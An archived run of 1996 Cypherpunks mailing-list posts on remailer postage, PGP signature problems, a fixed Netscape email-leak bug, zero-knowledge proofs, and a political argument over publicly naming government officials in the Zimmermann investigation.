ideas of terrorists, and actual participation in terror.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Sat, 13 Jan 96 10:48:30 PST
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Digital postage and remailer abuse
In-Reply-To: <2.2.32.19960113061303.0068e1f8@arn.net>
Message-ID: <Pine.SUN.3.91.960113104233.28281C-100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain



	David:
On Sat, 13 Jan 1996, David K. Merriman wrote:

> snailmail; particularly if the remailers were able to issue 'books' of stamps.
> It might even be possible to have each remailer issue Estamps (tm) of
> different 'kinds', much as there are different postage stamp 'themes'.

	I can see it now.  The 1997 Scott Standard Estamp Catalog:  
	Remailers of the World.  

> Having different stamps from each remailer would also allow some means of
> tracking spammers and rip-off artists ("hmmm. an 'Elvis' Estamp. That came
> from hactic; let's see if they can tell us who they sold this book to.....")

	OTOH, if hactic keeps records of who the stamps are sold to,
	that sort of defeats the anonymous nature of the remailers.

        xan

        jonathon
        grafolog@netcom.com




**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
***********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Jan 96 14:59:48 PST
To: "Philip L. Dubois" <dubois@dubois.com>
Subject: Re: News Release
Message-ID: <m0tbEgn-0008y9C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:37 PM 1/12/96 -0700, you wrote:

[stuff from Phil Zimmermann deleted for space.]


[other stuff by Dubois, Zimmermann's lawyer, deleted for space.]

>There are forces at work that will, if unresisted, take from us our 
>liberties.  There always will be.  But at least in the United States, our 
>rights are not so much stolen from us as they are simply lost by us.  The 
>price of freedom is not only vigilance but also participation.  Those 
>folks I mention in this message have participated and no doubt will 
>continue.  My thanks, and the thanks of Philip Zimmermann, to each of 
>you.

Dear Mr. Dubois,

  Thank you for your efforts on the behalf of Phil Zimmermann.  You are to
be praised.  However, you should recognize that at best, all you have done
is to reduce the harm done to him (or would otherwise have been done to
him), which admittedly is a good and right thing for you to have done.

However, I refer you to the 1964 movie, "Dr. Strangelove," whose title
character stated that "deterrence is the art of making the enemy FEAR to
attack."

In my opinion, we (the ordinary members of the public) cannot consider
ourselves to have won this encounter until the REAL enemy here, the
government employees who targeted Zimmermann, FEAR to attack ("legally" or
otherwise) people like Zimmermann.  

Ask Mr. Zimmerman about my essay, or I'd be happy to email it to you.
Sadly, he did not appreciate its simplicity and potential effectiveness, and
maybe you won't either, but someday it may protect your freedom in ways you
can't currently even imagine.

Jim Bell

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPg1cvqHVDBboB2dAQGv7wP+JTKihlMH0zeDGq1bsWK04nTe6zAkpemL
1jMbl7/6J8MSbPQPVgL7fzP3TfQHRmIwAhAZzd7cf440jAgQ4MvQxsDqMkrESky6
jTL+h3j79Lnt8WMd63cCWa2mn++2etMy4XRCkiK59ft187qGGpwitsHIzF8tKsQL
mm2K084tpO0=
=PY58
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 13 Jan 96 14:28:10 PST
To: e$@thumper.vmeng.com, cypherpunks@toad.com
Subject: Re: bad PGP signatures
In-Reply-To: <v02120d04ad1ddb75f3c3@[199.0.65.105]>
Message-ID: <199601132227.PAA28717@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself Bob Hettinga is alleged to have 
written:
>
> How 'bout this one, Bryce?
> 
> ;-)


Yep.  That one (mine, for those watching at home) verifies.  My
first guess is that it is because my messages are formatted for
64 columns and all the other messages that are failing to 
verify (like:

To: mix-l@vishnu.alias.net, remailer-operators@c2.org, \
cypherpunks@toad.com
Subject: New Mailing List (encrypted)
Date: Sat, 13 Jan 1996 13:42:49 -0600
From: John Perry <perry@vishnu.alias.net>

which just came through) are formatted for 80 or 79 or 78.


Perhaps thumper is chewing on lines longer than 78 or 76 or 
something.


Just a guess.


Bryce

PGP sig (New!  With cleartext timestamp!) follows


Sat Jan 13 15:26:48 MST 1996


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMPgxzfWZSllhfG25AQFu8QQAj/kc4jgYaKV4QAtvQDiZFIVSBPcgY1qR
4yJWNhlAioQ1I9g0WYiZjxUfa0hl+B77slSM362uaZxvotU1E440bpiZGMcaItBb
ebUDW0UxyhLnUEgcMqo5S8B9mY8eVKiV8j/VASt4bu7RexTyCuRU7VM8FDxj8Vpv
If1nqAsWTNg=
=Hilf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 13 Jan 96 17:22:40 PST
To: doclulu@infobahnos.com
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <199601140024.TAA20599@rizzo.infobahnos.com>
Message-ID: <30F8596B.5611@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


The snoop program is using FTP to find out the user's e-mail
address.  The image on the page is an ftp: URL.  Our FTP code
was sending the user's e-mail address as the password for
anonymous FTP, which is the usually requested by FTP sites.
The perl script was waiting for the FTP to happen, and then
looking at its log to figure out the email address.

  I've removed the code that uses the e-mail address as the
FTP password for anonymous FTPs.  You can still enter it by
hand by using a URL of this form 'ftp://anonymous@ftp.netscape.com'.
This will cause the navigator to prompt the user for the 
password to send for anonymous.  This is a little known feature
that will also allow users to access non-anonymous ftp
accounts via netscape.

  The fix for this will be in the next beta, and the final
version of 2.0.

	--Jeff

doclulu@infobahnos.com wrote:
> To: Rich Graves <llurch@networking.stanford.edu>
> Cc: cypherpunks@toad.com
> Subject: Re: (none) [httpd finding your identity]
> 
> At 11:28 96-01-12 -0800, you wrote:
> 
> >On Fri, 12 Jan 1996, sameer wrote:
> >
> >> > > control what information is passed out to the other end.
> >> > > Specifically, I'd like http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl
> >> > > to come up nearly blank.)
> >> >
> >> >   We do not send the HTTP 'From:' header.  I will look into where
> >> > they are getting the user name and location from.  There is really
> >> > nothing I can do in the Navigator to stop them from getting your
> >> > IP address or DNS name.
> >>
> >>      I beleive that it uses finger. If you really want to prevent
> >> people from finding out where you're coming from, use the
> >> anonymizer. Not at CMU? Don't worry.
> >
> >On most UNIX machines or a Mac or PC running most common talk clients?
> >Worry. Not just finger, but also identd will identify you. I think Eudora
> >Pro has an identd option, too.
> >
> >-rich
> >
> >
> 
>         On Win 3.1 using Netscape 1.22, you can improve your 'lack of
> output' by removing in the PREFERENCES menu: Your Name:
>                                   Your Email:
>                                   Your Organization:
>         The bad side is that you cannot mail from Netscape without filling
> the Email entry with a valid Email address and putting an anonymous address
> (ex.:an123456@anon.penet.fi) would cause
> http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl
>  to report your REAL hostname with your anonymous username
> (ex.:an123456@myhost.com)
> so if privacy is a must and you cannot use the anonymizer, this could reduce
> your output to your computer type and operating system and your browser and
> version number. For my part, after removing my Email, it was all that was
> left (-: ( It will stay that way... )

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 13 Jan 96 15:02:31 PST
To: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: Re: Theory Question: Why isn't RSA a 0-knowledge Proof
In-Reply-To: <9601132108.AA19991@rpcp.mit.edu>
Message-ID: <9601132301.AA12607@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Zero knowledge means that the recipient obtains no information that they could 
not have obtained without knowing the secret information corresponding to the 
key. 

If I authenticate myself to you by giving a signature on a nonce you chose you 
have obtained information that you could not have obtained otherwise.


If it wasn't for the fact that it is IAP and you apear to be a grad student I 
might wonder about somone doing their course assignments via the net... :-)


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Sat, 13 Jan 96 16:25:57 PST
To: cypherpunks@toad.com
Subject: Subscribing to cypher-list
Message-ID: <199601140022.SAA05143@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	First, the response to the PGPdomo list has been better than I
expected. But I see some clarification is required.

1. I have had several inquiries as to why the list is closed. Not
having a good reason as to why, I've opened the list. Anyone can
subscribe that wants to.

2. In order to subscribe, you must encrypt your subscription request
to: majordomo@vishnu.alias.net. You will NOT be auto-subscribed if it
isn't encrypted. That's the whole point of the security. Other than
the encryption, the subscription method is the same as most
majordomos.

3. Please send you subscription requests to
cypher-list-request@vishnu.alias.net rather than
majordomo@vishnu.alias.net. I was willing to add the subscriptions
that failed by hand, but the number of requests has made this a
time-consuming job.

4. What is the PGP public key for majordomo@vishnu.alias.net? It's
available by anonymous FTP from vishnu.alias.net as
ftp://vishnu.alias.net/pub/majordomo.pgp. I'm also listing the key
below.

	If you have any problems or questions, please feel free to
send email to perry@vishnu.alias.net.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzD33YoAAAEEAJ7dUgVGfaj9V+aV3HMtr2D8tgWlMSDveh5zlzfYrOm6Yv65
p3aWSpQPdoEN16UbCrUUy0AItnFwDkdfYBu8Q7jtL3VCiHo3h8UT+VtdTEN7DT5O
juUhSWuh7BBpmMbtnVvdQ3k1rx4ayh1SLufkgISy/HwP6A9VCdOhMeHnnvxhAAUR
tEVNYWpvcmRvbW8gTGlzdCBTZXJ2ZXIgLSBWaXNobnUuQWxpYXMuTmV0IDxtYWpv
cmRvbW9AdmlzaG51LmFsaWFzLm5ldD6JAJUDBRAw+Dpr06Ex4eee/GEBAd1eA/4y
GJBATAR9yIcgYEUVwbWiJbBPSbjx0jUviTJmkJc0RY3CaDrUTIoJKLYJgc5x52N9
aH8zgULIjqDcxx9N1wBHyRjE3ZoDgCt4+7gY0GsUHezvaBph2Z6kSitQOIEgO/Os
I7mOphPw6qgQLo0pnx6JWz6F1OqHTPDJW6QcvJA1wIkAlQMFEDD38cxTk6RE4a7Y
bwEB6SID/iQXhleyRH2Ekeumg+kndjfJ60JLa+psrSReHvmOGGwDUdwtTphgSWkK
p/LtLk6UGxjhcCOoXuRiAzolTl4inGbYewlclLKrV3wNm6XWM9NK5a8sfHkB40j2
wdnRiMrNrPDTH/ZDcpgW0z8AX8HkdNYFrISAFtPuxlL9eILHspfwiQEVAwUQMPfx
naghiWHnUu4JAQHyGAf6AySIiVtFGXdMXmuZ+1AxhUoo/8ZaskLFbm1E6/sc+/8q
ScBUAVcK8Ul/RVvL6dDv2th+lmgytZrsQ3FsiR6CDCXNoWG3t8QfuZn+zTt+vucw
+WaiRVdqry6Gl411rgGSyYeYjp4YcScWG0TB+y4Urzc126OJstKJcYyJdqs6kB6z
Vh0FHFPerWYzEvLjSiM/xxmTkRtUTaMH4qJ5txTnQlko4MxytUsi93Jz2cM46EWc
YY+OgBT3Vi6kvBrl8qPqos263A8GfMsGJKAOF2FjsxjPMG/tyXijn2xZcHZyw7jG
v6D4lLEhmW6zx2ki2AGvxZ82dc9yVkRafsYkW7SOsA==
=YIvQ
- -----END PGP PUBLIC KEY BLOCK-----

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPhMvKghiWHnUu4JAQHanQf+NdXGKkZWRGh6xYD+Vms526JjNTotgcEH
2aLoAWICOrLmPF/KbxhixG7YLBht8zXdnRWBjpAoNw9Uv19Sat7URE8NbVUyww12
0fHYLkGZUAb0gK6khH3rAMcciKHJWxfoY/LuObTxoVOX827ffvBEPO4M5p0HOcmP
w6ieHzp9SphC9kMaj/Vpf+Kc3gYZjYfnn5xRCzexEiMrz/+EPKNUKyErl70TdLH6
KtoUnrSW5bQVyTmloSzBDYhkPxORWu3soQO3tC0UvUptAEpdl7z9zlLolpEYzlyk
HxWNdtGgitMeUO+c4OlKG1tJuKLxJ09nkH/bWerkohFnBxS67IUDwA==
=Q7Ft
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 13 Jan 96 15:28:53 PST
To: rsalz@osf.org (Rich Salz)
Subject: Re: Boston talk on offshore banks
In-Reply-To: <9601122001.AA18808@sulphur.osf.org>
Message-ID: <199601132332.SAA26819@homeport.org>
MIME-Version: 1.0
Content-Type: text


Rich Salz wrote:

| I heard an ad on the radio for a free seminar on how to protect your assets
| using off-shore banks.  I forget who the speaker is, I think they're with
| the English-Irish bank in Austria, or something like that.  The thrust
| was to save assets for when you retire and Social Security isn't there
| for you.

| Two dates, Jan 17 (Newton, MA) or Jan 18 (Burlington, MA).
| Call 617 663 3299 for more info.

"We're sorry, the number you've provided is invalid.  Please check the
number send your message again." :)

	I'd be interested in going, if anyone can get information.
Nynex claims that thats not a valid listing.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doclulu@infobahnos.com
Date: Sat, 13 Jan 96 16:24:25 PST
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: (none) [httpd finding your identity]
Message-ID: <199601140024.TAA20599@rizzo.infobahnos.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: Rich Graves <llurch@networking.stanford.edu>
Cc: cypherpunks@toad.com 
Subject: Re: (none) [httpd finding your identity]

At 11:28 96-01-12 -0800, you wrote:

>On Fri, 12 Jan 1996, sameer wrote:
>
>> > > control what information is passed out to the other end. 
>> > > Specifically, I'd like http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl 
>> > > to come up nearly blank.)
>> > 
>> >   We do not send the HTTP 'From:' header.  I will look into where
>> > they are getting the user name and location from.  There is really
>> > nothing I can do in the Navigator to stop them from getting your
>> > IP address or DNS name.
>> 
>> 	I beleive that it uses finger. If you really want to prevent
>> people from finding out where you're coming from, use the
>> anonymizer. Not at CMU? Don't worry.
>
>On most UNIX machines or a Mac or PC running most common talk clients?
>Worry. Not just finger, but also identd will identify you. I think Eudora
>Pro has an identd option, too. 
>
>-rich
>
>

        On Win 3.1 using Netscape 1.22, you can improve your 'lack of
output' by removing in the PREFERENCES menu: Your Name:
                                  Your Email:
                                  Your Organization:
        The bad side is that you cannot mail from Netscape without filling
the Email entry with a valid Email address and putting an anonymous address
(ex.:an123456@anon.penet.fi) would cause
http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl
 to report your REAL hostname with your anonymous username
(ex.:an123456@myhost.com) 
so if privacy is a must and you cannot use the anonymizer, this could reduce
your output to your computer type and operating system and your browser and
version number. For my part, after removing my Email, it was all that was
left (-: ( It will stay that way... )
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPhL8l0tVeSYE8qJAQFN9AQAgXcbJzhqbExyvVA+5VZXojCuUGxJsH0e
qhmSmn9I6vInIzfJNoUi1I5tdwVqOFaheFTh6XPYjVIRnCNx4g0u3z2Mjx8V2B0a
O66XsFFX3tgCHizIVFkXJ1rzOXRDXCBb4joo+500MOWi77GgfHBMd1F3IBTcS2i6
8QZshD4gF0U=
=9rLo
-----END PGP SIGNATURE-----
-------------------------------------------------------------------------
Eric Francoeur                        | "One of the things Adolf Hitler 
E-Mail: doclulu@infobahnos.com        |  and Bill Clinton have in common 
http://www.infobahnos.com/~doclulu    |  is that both were democratically 
PGP Public key available at website   |  democratically elected leaders." 
                                      |  -Dr. Dimitri Vuli 1995.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 13 Jan 96 16:56:01 PST
To: hallam@w3.org
Subject: Re: Theory Question: Why isn't RSA a 0-knowledge Proof
Message-ID: <9601140057.AA21183@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 06:01 PM 1/13/96 -0500, you wrote:
>
>Zero knowledge means that the recipient obtains no information that they could 
>not have obtained without knowing the secret information corresponding to the 
>key. 
>
>If I authenticate myself to you by giving a signature on a nonce you chose you 
>have obtained information that you could not have obtained otherwise.

        Seems right enough.

        Still pondering though... 

[1]  If I (the signer) choose the series of messages to sign, this still
demonstrates that I have a secret without telling you the secret (and
without giving you the information you might have been fishing for..)  You
do get information you would not have been able to create
otherwise,(whatever it is I choose to sign) ...but it doesn't matter if you
wanted the information or not, what matters is that you got it???  You could
get random information (entropy) as part of a protocol, would this destroy
the 0-knowledge aspect as well (and make it merely a min-disclosure
proof...?))  (if you aren't directly challanging me, there could be a replay
or man in the middle attack or whatnot, but the man in the middle attack
also applies to 0KP.)

        What I was thinking of, was a hamiltonian cycle example:

[2]where the person that wants to see the proof is getting information
regarding the iso-morphism between the various graphs... (For instance, say
G is the real graph, Alice knows the path, and Bob wants proof that Alice
knows it...)  So in the first instance Alice produces H1 and shows it to Bob
and proves it is iso-morphic, in the second example she produces H2 and
shows the cycle, in the third instance, she provides H3 and it's isomorphism
to G... Bob can then conclude that H1 and H2 are isomorphic... I'm not sure
about this (this must be where I am in error) but I don't think Bob could
have derived the fact easily (if it is plausible for him to believe H1~=H2
based on this protocol) that H1 and H2 are isomorphic without Alice's help
here... So in this case, Bob picked up some info he would have not otherwise
known for free (similar to the first example) even though this information
isn't of any use to him with regard to the solution to G.

>If it wasn't for the fact that it is IAP and you apear to be a grad student I 
>might wonder about somone doing their course assignments via the net... :-)

        The effect of the eggnaugh hasn't worn off and trying to vamp up...
<smile>
_______________________
Regards,               Is this true or only clever? -Augustine Birrell
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 13 Jan 96 18:21:16 PST
To: cypherpunks@toad.com
Subject: PGP replay attack
Message-ID: <Pine.LNX.3.91.960113210506.481A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There has been some discussion on using replay attacks against PGP
recently.  However, a timestamp is stored in the signature packet and is
signed along with the plaintext intended to be signed.  This eliminates the
need to include a timestamp in clear-signed data.  Someone can still send
a signed e-mail to a third party that was not the original recipient and
make it appear as though the sender did actually send the message to the
third party (e.g.

	Alice sends signed message to Bob
	Bob sends message with faked headers signed by Alice to Carol
	Carol believes Alice actually sent the message to her)

Such an attack would have to executed shortly after the message was originally
clear-signed.  However, including timestamps in text to be signed is not
necessary.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPhourZc+sv5siulAQHTTAP/XBlrV7nHd5pR9aTXr2Uk0M0fw4I6IjZZ
xeCx++vuIjcQuo/k8xH9YvBbn+MuoE11xbVLD58xYbELuVSdMUzCQ1mpQMho8mzs
O0ALr8dahq0N0Gl5kLwb97MzgJOgTwy6NSIK6883NCktAWJMsFoADpdzmDGWQbTc
ZzXJ3w5OiAQ=
=fWJb
-----END PGP SIGNATURE-----


--
finger -l markm@voicenet.com for PGP key  http://www.voicenet.com/~markm/
Fingerprint: bd24d08e3cbb53472054fa56002258d5  Key-ID: 0xf9b22ba5
"The NSA can have my private key when they pry it from my cold, dead
neurons." Unknown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmerritt@intellinet.com (Charlie Merritt)
Date: Sat, 13 Jan 96 19:42:10 PST
To: Cypherpunks@toad.com
Subject: exposure=deterence?
Message-ID: <199601140345.VAA26416@intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain


jimbell@pacifier.com  (Jim Bell)  wrote in part:

>In my opinion, we (the ordinary members of the public) cannot consider
>ourselves to have won this encounter until the REAL enemy here, the
>government employees who targeted Zimmermann

There is a group of government employees that decided to 
put William Keane on this case.  Someone(s) started sending
customs agents around the country.  Someone(s) is responsible
for making several defenders of privacy miserable.
These government employees SHOULD NOT be allowed to hide
in their government holes in complete privacy.

We need the credits now that the movie is over.
How much money was spent?  [FOI anyone?]

I am afraid that all I could provide is the name
of one Customs Special Agent.  I dont think she
is responsible for anything - she was told go interview
so-and-so and off she goes.  Who sent her?

---> How could we find out? <---

It seems correct that the NAMES of the government employees
and HOW MUCH MONEY THEY SPENT be made public.
Deterent enough.

I feel that public exposure
is enough to put fear into these anonymous government employees.
You will note that when they get the mad_bomber
some FBI guy jumps right up and takes credit, live, on TV.
But when the Air Force orders a $300 toilet seat NO ONE is credited.

Boy!  Am I pissed!

...cm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 96 21:55:08 PST
To: cypherpunks@toad.com
Subject: Re: [noise] The economics of super-stars - partial cite
In-Reply-To: <Pine.SOL.3.91.960113185520.22640A-100000@chivalry>
Message-ID: <Pine.ULT.3.91.960113214009.20241E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jan 1996, Simon Spero wrote:

> This came up at the bay area cyherpunks meeting - I haven't got the full 
> citation, but the orignal paper was by Sherwin Rosen of the University of 
> Chicago; it was published in 1981, under the title "The Economics of 
> Superstars" - I think it might be in:
> 
>         TITLE: Studies in labor markets / edited by Sherwin Rosen.
>         PUBLICATION: Chicago : University of Chicago Press, 1981.
>         DESCRIPTION: ix, 395 p. ; 24 cm.
>              SERIES: Conference report / Universities--National Bureau 
> 		    Committee  for Economic Research ; no. 31

For anotehr view suggesting that Rosen is himself dazzled by superstars,
see The Other Path, by Hernando de Soto, ISBN 0-06-091640-0 (paperback)
and 0-06-016020-9 (hard). 

This is the 260-page executive summary of a study of the "informal
economy" in the major Peruvian cities. I think the expanded El otro
sendero with statistical appendices is only available in Spanish. 

Title refers to Sendero Luminoso, a particularly bizarre Maoist cult that 
has been brutally repressed by Fujimori in recent years. De Soto argues 
that the masses are a lot smarter than most economists and governments 
think, that most humans are entrepreneurs, and that the informal economy 
serves people a lot better than either Fordist capitalism or a "communist"
revolution.

As if anyone has time to read such a thing.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 13 Jan 96 22:22:54 PST
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <199601140345.VAA26416@intellinet.com>
Message-ID: <30F89FD6.1942@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca wrote:
> 
> My apologies for responding to a political post.
> 
> On Sat, 13 Jan 1996, Charlie Merritt wrote:
> 
> > I feel that public exposure
> > is enough to put fear into these anonymous government employees.
> > You will note that when they get the mad_bomber
> > some FBI guy jumps right up and takes credit, live, on TV.
> > But when the Air Force orders a $300 toilet seat NO ONE is credited.
> 
> It's interesting how we advocate anonymity for ourselves but not for our
> opponents. Feeling righteous?
> 
> Reminds me of the bit from True Names about all the warlocks trying to
> crack each other's nyms to enslave each other. Sad?

  There is a big difference between private citizens going about their
private business, and government officials acting in an official
capacity.  One of the tools of a free society is government oversite.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 13 Jan 96 21:21:00 PST
To: s1018954@aix2.uottawa.ca
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <9601140520.AA26619@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: s1018954@aix2.uottawa.ca
> 
> My apologies for responding to a political post.
> 
> On Sat, 13 Jan 1996, Charlie Merritt wrote:
> 
> > I feel that public exposure
> > is enough to put fear into these anonymous government employees.
> > You will note that when they get the mad_bomber
> > some FBI guy jumps right up and takes credit, live, on TV.
> > But when the Air Force orders a $300 toilet seat NO ONE is credited.
> 
> It's interesting how we advocate anonymity for ourselves but not for our
> opponents. Feeling righteous?

There is a *big* difference between anonymity for individuals, and
anonymity for government officials acting in the name of the government.
Government has no right to privacy.  Individuals do.

> Reminds me of the bit from True Names about all the warlocks trying to 
> crack each other's nyms to enslave each other. Sad?
> 

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Jan 96 23:50:58 PST
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <m0tbMrS-0008xFC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 AM 1/14/96 -0500, s1018954@aix2.uottawa.ca wrote:
>My apologies for responding to a political post.
>
>On Sat, 13 Jan 1996, Charlie Merritt wrote:
>
>> I feel that public exposure
>> is enough to put fear into these anonymous government employees.
>> You will note that when they get the mad_bomber
>> some FBI guy jumps right up and takes credit, live, on TV.
>> But when the Air Force orders a $300 toilet seat NO ONE is credited.
>
>It's interesting how we advocate anonymity for ourselves but not for our
>opponents. Feeling righteous?

Maybe I don't understand your point, but... 

1.  Individual private citizens acting on their own deserve privacy and
anonymity.
2.  Government employees receiving paychecks based on tax dollars stolen
from members of the public do not.
3.  Individuals not harming others deserve privacy and anonymity.
4.  Government employees threatening citizens with large fines and jail
time, for doing what we consider right and good, do not.

Get the picture?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 13 Jan 96 21:04:49 PST
To: cypherpunks@toad.com
Subject: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <199601140345.VAA26416@intellinet.com>
Message-ID: <Pine.3.89.9601132350.A15455-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


My apologies for responding to a political post.

On Sat, 13 Jan 1996, Charlie Merritt wrote:

> I feel that public exposure
> is enough to put fear into these anonymous government employees.
> You will note that when they get the mad_bomber
> some FBI guy jumps right up and takes credit, live, on TV.
> But when the Air Force orders a $300 toilet seat NO ONE is credited.

It's interesting how we advocate anonymity for ourselves but not for our
opponents. Feeling righteous?

Reminds me of the bit from True Names about all the warlocks trying to 
crack each other's nyms to enslave each other. Sad?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 14 Jan 96 07:14:10 PST
To: cypherpunks@toad.com
Subject: FIN_sin
Message-ID: <199601141513.KAA01435@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The January 22 New York magazine, a local weekly, reports
   in "The Money Plane":

      Five nights a week, at least $100 million in crisp new
      $100 dollar bills is flown from JFK nonstop to Moscow,
      where it is used to finance the Russian mob's vast and
      growing international crime syndicate. State and federal
      officials believe it is part of a multi-billion-dollar
      money-laundering operation. The Republic National Bank
      and The United States Federal Reserve prefer not to
      think so.

      "That money is used to support organized crime; it's
      used to support black-market operations," says one
      federal official. "In my personal opinion, this is an
      abomination. Yet it appears that at least part of the
      federal government sees nothing wrong with it."

      FINCEN director Stanley Morris is more blunt: "Russia's
      banking system is a cesspool."

   FIN_sin










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Sun, 14 Jan 96 10:48:12 PST
To: cypherpunks@toad.com
Subject: Hate Speech Ban Metaphor
Message-ID: <2.2.32.19960114184910.0068d95c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Saw this on news.admin.net-abuse.misc:

In article <ebohlmanDL3M0I.B2J@netcom.com>,
   ebohlman@netcom.com (Eric Bohlman) wrote:
<snip>
:Banning this sort of discussion accomplishes nothing positive.  It 
:creates the *appearance* of having fought bigotry without actually having 
:done so.  It doesn't address the problem, it sweeps it under the rug, and 
:bigotry that's been swept under the rug has a nasty habit of catching 
:fire.  Banning hate speech is sort of like sending a business card to 
:Craig Shergold; it lets you feel like you've done your good deed for the 
:day, even though you really haven't.
<snip>

That gets _my_ vote for metaphor of the day.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 14 Jan 96 08:22:33 PST
To: cypherpunks@toad.com
Subject: A pooled e-cash FOIA request
